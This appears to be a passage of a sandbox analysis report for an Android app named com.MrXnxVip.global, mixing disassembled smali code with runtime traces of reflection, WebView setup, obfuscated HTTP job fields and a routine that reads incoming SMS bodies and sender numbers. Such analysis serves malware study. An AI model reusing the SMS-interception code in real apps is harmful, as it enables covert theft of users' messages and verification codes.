                          • p1: [Ljava.lang.Object;@9e27cbb
                          • p1.Arrays.toString: [anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ........ 0,0-441,597 #1}, {parent=, drawable={color=-984833, csType=Dbasic.Designer.Drawable.ColorDrawable, type=.drawable.ColorDrawable}, visible=true, :kids={0={padding=null, parent=Activity, visible=true, csType=Dbasic.Designer.MetaWebView, zoomEnabled=false, vanchor=0, type=.WebViewWrapper, enabled=true, variant0={top=0, left=0, hanchor=0, width=320, vanchor=0, height=430}, javaType=.WebViewWrapper, top=100, left=100, hanchor=0, name=WebView1, width=200, eventName=WebView1, javaScriptEnabled=true, tag=, height=200}}, csType=Dbasic.Designer.MetaActivity, type=.ActivityWrapper, title=Activity, variant0={top=100, left=100, hanchor=0, width=100, vanchor=0, height=100}, fullScreen=false, javaType=.ActivityWrapper, animationDuration=400, titleColor=-984833, top=100, left=100, name=Activity, width=100, eventName=Activity, includeTitle=false, tag=, height=100}, false, com.MrXnxVip.global.main@ff69451]
                          • Return:
                            • anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ......I. 0,0-0,0}
                        • Reflective invoke: anywheresoftware.b4a.objects.WebViewWrapper.build
                          • p0: null
                          • p1: {padding=null
                          • p2: parent=Activity
                          • p3: visible=true
                          • p4: csType=Dbasic.Designer.MetaWebView
                          • p5: zoomEnabled=false
                          • p6: vanchor=0
                          • p7: type=.WebViewWrapper
                          • p8: enabled=true
                          • p9: variant0={top=0
                          • p10: left=0
                          • p11: hanchor=0
                          • p12: width=320
                          • p13: vanchor=0
                          • p14: height=430}
                          • p15: javaType=.WebViewWrapper
                          • p16: top=0
                          • p17: left=0
                          • p18: hanchor=0
                          • p19: name=WebView1
                          • p20: width=320
                          • p21: eventName=WebView1
                          • p22: javaScriptEnabled=true
                          • p23: tag=
                          • p24: height=430}
                          • p25: false
                          • p26: com.MrXnxVip.global.main@ff69451
                          • Return:
                            • android.webkit.WebView{d75d2d VFEDHVC.. ......I. 0,0-0,0}
                        • Time: 693158
                          • This:
                            • public static android.view.View anywheresoftware.b4a.objects.WebViewWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
                            • getName:build
                          • p0: null
                          • p1: [Ljava.lang.Object;@7e49262
                          • p1.Arrays.toString: [null, {padding=null, parent=Activity, visible=true, csType=Dbasic.Designer.MetaWebView, zoomEnabled=false, vanchor=0, type=.WebViewWrapper, enabled=true, variant0={top=0, left=0, hanchor=0, width=320, vanchor=0, height=430}, javaType=.WebViewWrapper, top=0, left=0, hanchor=0, name=WebView1, width=320, eventName=WebView1, javaScriptEnabled=true, tag=, height=430}, false, com.MrXnxVip.global.main@ff69451]
                          • Return:
                            • android.webkit.WebView{d75d2d VFEDHVC.. ......I. 0,0-0,0}
                        74move-result-object p0
                        75try_end_56: return-object p0
                        76catch_57: move-exception p0
                        78invoke-static {v0, v1, p0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
                        79goto/16 :goto_69
                        80catch_5c: move-exception p0
                        82invoke-virtual {p0}, Ljava/lang/reflect/InvocationTargetException;->getCause()Ljava/lang/Throwable;
                        83move-result-object p1
                        84instance-of p1, p1, Ljava/io/FileNotFoundException;
                        85if-eqz p1, :cond_66
                        86move-object v0, v1
                        87cond_66:
                        88invoke-static {v0, v1, p0}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Throwable;)I
                        89goto_69: return-object v3
                        Cross References
                        APIs
                        • java.lang.Object.toString
                        • java.lang.String.length
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.toLowerCase
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getField
                        • java.lang.reflect.Field.get
                        Strings
                        • .
                        • com.MrXnxVip.global.starter
                        • processBA
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/ClassNotFoundException;,
                        3Ljava/lang/IllegalArgumentException;,
                        4Ljava/lang/SecurityException;,
                        5Ljava/lang/IllegalAccessException;,
                        6Ljava/lang/NoSuchFieldException;
                        7}
                        8.end annotation
                        9instance-of v0, p1, Ljava/lang/Class;
                        10if-eqz v0, :cond_7
                        11check-cast p1, Ljava/lang/Class;
                        12goto/16 :goto_42
                        13cond_7: instance-of v0, p1, Lanywheresoftware/b4a/B4AClass;
                        14if-eqz v0, :cond_12
                        15check-cast p1, Lanywheresoftware/b4a/B4AClass;
                        17invoke-interface {p1}, Lanywheresoftware/b4a/B4AClass;->getBA()Lanywheresoftware/b4a/BA;
                        18move-result-object p0
                        19return-object p0
                        20cond_12: if-eqz p1, :cond_4f
                        22invoke-virtual {p1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        23move-result-object v0
                        25invoke-virtual {v0}, Ljava/lang/String;->length()I
                        26move-result v0
                        27if-nez v0, :cond_1f
                        28goto/16 :goto_4f
                        29cond_1f: new-instance p0, Ljava/lang/StringBuilder;
                        31sget-object v0, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        33invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        34move-result-object v0
                        36invoke-direct {p0, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        38const-string v0, "."
                        40invoke-virtual {p0, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        41check-cast p1, Ljava/lang/String;
                        43sget-object v0, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        45invoke-virtual {p1, v0}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        46move-result-object p1
                        48invoke-virtual {p0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50invoke-virtual {p0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        51move-result-object p0
                        53invoke-static {p0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 824966
                          • p0: com.MrXnxVip.global.starter
                          • Return:
                            • class com.MrXnxVip.global.starter
                            • getName: com.MrXnxVip.global.starter
                        54move-result-object p1
                        55goto_42:
                        56const-string p0, "processBA"
                        58invoke-virtual {p1, p0}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        59move-result-object p0
                        60const/4 p1, 0x0
                        62invoke-virtual {p0, p1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 695464
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.firebasemessaging.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • anywheresoftware.b4a.BA@eb7fd4
                        • Time: 695733
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.httputils2service.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • null
                        • Time: 697176
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.httputils2service.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • anywheresoftware.b4a.BA@3510b3c
                        • Time: 700206
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.main.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • anywheresoftware.b4a.BA@a854acb
                        • Time: 824884
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.firebasemessaging.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • anywheresoftware.b4a.BA@98ddab1
                        • Time: 824967
                          • This:
                            • public static anywheresoftware.b4a.BA com.MrXnxVip.global.starter.processBA
                            • getName:processBA
                          • p0: null
                          • Return:
                            • anywheresoftware.b4a.BA@198c7ae
                        63move-result-object p0
                        64check-cast p0, Lanywheresoftware/b4a/BA;
                        65goto_4f: return-object p0
                        Cross References
                        APIs
                        • java.lang.Class.getName
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.lang.reflect.Method.getParameterTypes
                        • java.lang.reflect.Method.invoke
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • null
                        • Method:
                        • not matched.
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6invoke-direct {p0}, Lanywheresoftware/b4j/object/JavaObject;->getCurrentClass()Ljava/lang/Class;
                        7move-result-object v0
                        9sget-object v1, Lanywheresoftware/b4j/object/JavaObject;->methodCache:Lanywheresoftware/b4j/object/JavaObject$MethodCache;
                        11invoke-virtual {v0}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        12move-result-object v0
                        14invoke-virtual {v1, v0, p1, p2}, Lanywheresoftware/b4j/object/JavaObject$MethodCache;->getMethod(Ljava/lang/String;Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/List;
                        15move-result-object v0
                        17invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        18move-result-object v0
                        19cond_12:
                        20invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        21move-result v1
                        22if-nez v1, :cond_1a
                        23const/4 v0, 0x0
                        24goto/16 :goto_2b
                        25cond_1a:
                        26invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        27move-result-object v1
                        28check-cast v1, Ljava/lang/reflect/Method;
                        30invoke-virtual {v1}, Ljava/lang/reflect/Method;->getParameterTypes()[Ljava/lang/Class;
                        31move-result-object v2
                        33invoke-direct {p0, v2, p2}, Lanywheresoftware/b4j/object/JavaObject;->arrangeAndCheckMatch([Ljava/lang/Class;[Ljava/lang/Object;)Z
                        34move-result v2
                        35if-eqz v2, :cond_12
                        36move-object v0, v1
                        37goto_2b: if-eqz v0, :cond_36
                        39invoke-virtual {p0}, Lanywheresoftware/b4j/object/JavaObject;->getObject()Ljava/lang/Object;
                        40move-result-object p1
                        42invoke-virtual {v0, p1, p2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 820029
                          • This:
                            • public java.lang.String com.MrXnxVip.global.newmessage1.GET(java.lang.String,android.content.Intent)
                            • getName:GET
                          • p0: com.MrXnxVip.global.newmessage1@9fe7bbb
                          • p1: [Ljava.lang.Object;@a4bcc17
                          • p1.Arrays.toString: [body, Intent { act=android.provider.Telephony.SMS_RECEIVED (has extras) }]
                          • Return:
                            • null
                        43move-result-object p1
                        44return-object p1
                        45cond_36: new-instance p2, Ljava/lang/RuntimeException;
                        46new-instance v0, Ljava/lang/StringBuilder;
                        48const-string v1, "Method: "
                        50invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        52invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        54const-string p1, " not matched."
                        56invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        58invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        59move-result-object p1
                        61invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        62goto/16 :goto_50
                        63goto_4f: throw p2
                        64goto_50: goto/16 :goto_4f
                        APIs
                        • android.content.Intent.getExtras
                        • android.os.Bundle.get
                        • java.lang.StringBuilder.<init>
                        • android.telephony.SmsMessage.createFromPdu
                        • android.telephony.SmsMessage.getMessageBody
                        • java.lang.StringBuilder.append
                        • android.telephony.SmsMessage.getOriginatingAddress
                        • java.lang.StringBuilder.toString
                        • java.lang.String.toLowerCase
                        • java.lang.String.contains
                        • java.lang.String.contains
                        Strings
                        • pdus
                        • body
                        • number
                        Position Instruction Meta Information
                        1invoke-virtual {p2}, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
                        • Time: 820019
                          • This:
                            • Intent { act=android.provider.Telephony.SMS_RECEIVED (has extras) }
                          • Return:
                            • Bundle[mParcelledData.dataSize=96]
                        2move-result-object p2
                        4const-string v0, ""
                        5if-eqz p2, :cond_57
                        6try_start_8:
                        7const-string v1, "pdus"
                        9invoke-virtual {p2, v1}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
                        10move-result-object p2
                        11check-cast p2, [Ljava/lang/Object;
                        12array-length v1, p2
                        13if-nez v1, :cond_14
                        14return-object v0
                        15cond_14: array-length v1, p2
                        16new-array v1, v1, [Landroid/telephony/SmsMessage;
                        17new-instance v2, Ljava/lang/StringBuilder;
                        19invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        20const/4 v3, 0x0
                        21const/4 v4, 0x0
                        22goto_1e: array-length v5, p2
                        23if-ge v4, v5, :cond_37
                        24aget-object v5, p2, v4
                        25check-cast v5, [B
                        27invoke-static {v5}, Landroid/telephony/SmsMessage;->createFromPdu([B)Landroid/telephony/SmsMessage;
                        • Time: 820028
                          • p0: [B@1eefbb1
                          • p0: 2Tvz
                          • p0: 01000A811032547698000005C47ABB9D07
                          • Return:
                            • null
                        • Time: 820042
                          • p0: [B@316d46e
                          • p0: 2Tvz
                          • p0: 01000A811032547698000005C47ABB9D07
                          • Return:
                            • null
                        28move-result-object v5
                        29aput-object v5, v1, v4
                        30aget-object v5, v1, v4
                        32invoke-virtual {v5}, Landroid/telephony/SmsMessage;->getMessageBody()Ljava/lang/String;
                        33move-result-object v5
                        35invoke-virtual {v2, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36add-int/lit8 v4, v4, 0x1
                        37goto/16 :goto_1e
                        38cond_37: aget-object p2, v1, v3
                        40invoke-virtual {p2}, Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
                        41move-result-object p2
                        43invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        44move-result-object v1
                        46invoke-virtual {p1}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        47move-result-object p1
                        49const-string v2, "body"
                        51invoke-virtual {p1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        52move-result v2
                        53if-eqz v2, :cond_4e
                        54return-object v1
                        55cond_4e:
                        56const-string v1, "number"
                        58invoke-virtual {p1, v1}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        59move-result p1
                        60try_end_54: if-eqz p1, :cond_57
                        61return-object p2
                        62cond_57: return-object v0
                        Cross References
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Object.getClass
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        Strings
                        • com.MrXnxVip.global.httpjob
                        • _class_globals
                        • class_globals
                        • java.lang.String@2771ce9
                        • java.lang.String@309dcfb
                        • java.lang.String@b8d1c0f
                        • java.lang.String@eacb771
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6iget-object v0, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        7if-nez v0, :cond_22
                        8new-instance v0, Lanywheresoftware/b4a/BA;
                        10sget-object v1, Lcom/MrXnxVip/global/httpjob;->htSubs:Ljava/util/HashMap;
                        12const-string v2, "com.MrXnxVip.global.httpjob"
                        14invoke-direct {v0, p1, p0, v1, v2}, Lanywheresoftware/b4a/BA;-><init>(Lanywheresoftware/b4a/BA;Ljava/lang/Object;Ljava/util/HashMap;Ljava/lang/String;)V
                        15iput-object v0, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        17sget-object p1, Lcom/MrXnxVip/global/httpjob;->htSubs:Ljava/util/HashMap;
                        18if-nez p1, :cond_22
                        20iget-object p1, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        22invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 688276
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Class@d79d8b3
                            • getName: com.MrXnxVip.global.httpjob
                          • Return:
                            • java.lang.Class@d79d8b3
                            • getName: com.MrXnxVip.global.httpjob
                        • Time: 688282
                          • This:
                            • java.lang.reflect.Field@e77a5e9
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 688286
                          • This:
                            • java.lang.reflect.Field@c2f4d0f
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 688333
                          • This:
                            • java.lang.reflect.Field@d1dab2b
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        • Time: 824547
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Class@4c6f501
                            • getName: com.MrXnxVip.global.httpjob
                          • Return:
                            • java.lang.Class@4c6f501
                            • getName: com.MrXnxVip.global.httpjob
                        • Time: 824548
                          • This:
                            • java.lang.reflect.Field@722cfa6
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 824554
                          • This:
                            • java.lang.reflect.Field@72ce03d
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 824594
                          • This:
                            • java.lang.reflect.Field@119e2
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        23move-result-object v0
                        25invoke-virtual {p1, v0}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        27iget-object p1, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        29iget-object p1, p1, Lanywheresoftware/b4a/BA;->htSubs:Ljava/util/HashMap;
                        30sput-object p1, Lcom/MrXnxVip/global/httpjob;->htSubs:Ljava/util/HashMap;
                        31cond_22:
                        32iget-object p1, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        34invoke-static {p1}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        35move-result p1
                        36const/4 v0, 0x0
                        37if-eqz p1, :cond_45
                        39invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        40move-result-object p1
                        41const/4 v1, 0x1
                        42new-array v2, v1, [Ljava/lang/Class;
                        43const-class v3, Lcom/MrXnxVip/global/httpjob;
                        44aput-object v3, v2, v0
                        46const-string v3, "_class_globals"
                        48invoke-virtual {p1, v3, v2}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        49move-result-object p1
                        50new-array v1, v1, [Ljava/lang/Object;
                        51const/4 v2, 0x0
                        52aput-object v2, v1, v0
                        54invoke-virtual {p1, p0, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        55goto/16 :goto_51
                        56cond_45:
                        57iget-object v3, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        58const/4 v4, 0x0
                        59const/4 v5, 0x1
                        60const/4 v7, 0x0
                        61new-array v8, v0, [Ljava/lang/Object;
                        63const-string v6, "class_globals"
                        65invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 695279
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Class@d79d8b3
                            • getName: com.MrXnxVip.global.httpjob
                        • Time: 695281
                          • This:
                            • java.lang.reflect.Field@e336379
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 695284
                          • This:
                            • java.lang.reflect.Field@558ad1f
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 695307
                          • This:
                            • java.lang.reflect.Field@fe4fc3b
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@9fb8f58
                        • Time: 695309
                          • This:
                            • java.lang.reflect.Field@bd908b1
                            • getName:_vvvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        • Time: 695310
                          • This:
                            • java.lang.reflect.Field@5f4d196
                            • getName:_vvvvvvvvv1
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117
                        • Time: 695330
                          • This:
                            • java.lang.reflect.Field@8464904
                            • getName:_vvvvvvvvv2
